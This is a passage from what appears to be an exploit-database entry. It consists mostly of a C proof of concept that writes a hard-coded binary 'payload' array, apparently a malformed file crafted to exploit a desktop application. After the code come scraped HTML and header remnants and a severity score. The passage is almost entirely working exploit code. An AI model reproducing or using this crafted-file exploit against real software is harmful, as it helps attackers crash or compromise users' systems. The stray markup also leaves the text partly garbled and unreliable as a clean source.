0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x3A, 0x00, 0x3A, 0x00, 0x4D, 0x00, 0x6F, 0x00, 0x64,
0x00, 0x69, 0x00, 0x66, 0x00, 0x69, 0x00, 0x65, 0x00, 0x64, 0x00, 0x42, 0x00, 0x6F, 0x00, 0x6F,
0x00, 0x6C, 0x00, 0x65, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x54, 0x00, 0x52, 0x00, 0x55, 0x00, 0x45,
0x00, 0xF7, 0xB0, 0xE8, 0x3C, 0x65, 0x01, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x00,
0x00, 0xAE, 0x00, 0xE9, 0x3C, 0x00, 0x00, 0x00, 0x00, 0xEA, 0x3A, 0x69, 0x10, 0xA2, 0xD7, 0x08,
0x00, 0x2B, 0x30, 0x30, 0x9D, 0x08, 0x33, 0x7C, 0x00, 0x78, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x03, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0xFF, 0x55, 0x1A, 0x8B, 0xFF, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xDD, 0x0A, 0x10,
0x00, 0x83, 0x01, 0x04, 0x00, 0x03, 0x00, 0xFC, 0x9C, 0x21, 0x10, 0x00, 0xDD, 0xD4, 0x1C, 0x12,
0x00, 0x00, 0x02, 0x00, 0x55, 0x53, 0x55, 0x53, 0x2E, 0x00, 0x2C, 0x00, 0x12, 0x00, 0xD4, 0xDD,
0x0B, 0x0B, 0x00, 0x03, 0x00, 0x00, 0x04, 0x0B, 0x00, 0xDD, 0xD4, 0x5F, 0x10, 0x00, 0x00, 0x06,
0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x00, 0xD4, 0x5A, 0x65, 0x72, 0x6F, 0x80, 0x53,
0x63, 0x69, 0x65, 0x6E, 0x63, 0x65, 0x80, 0xD4, 0x5F, 0x10, 0x00, 0x00, 0x06, 0x00, 0x02, 0x00,
0x00, 0x00, 0x00, 0x01, 0x10, 0x00, 0xD4, 0x4C, 0x61, 0x62, 0xD4, 0x5F, 0x10, 0x00, 0x00, 0x06,
0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x00, 0xD4 //2810 bytes
};
int main(int argc, char *argv[])
{
corel = fopen(OCCUPANT, "wb");
if(corel==NULL)
{
perror("\nWoow Camel! Can't open file...\n");
}
fwrite(payload,1,sizeof(payload),corel);
fclose(corel);
sleep(1);
printf("\nIt is done!\n");
return 0;
}
</stdint.h></stdlib.h></string.h></stdio.h></p></body></html>8.6 High
AI Score
Confidence
Low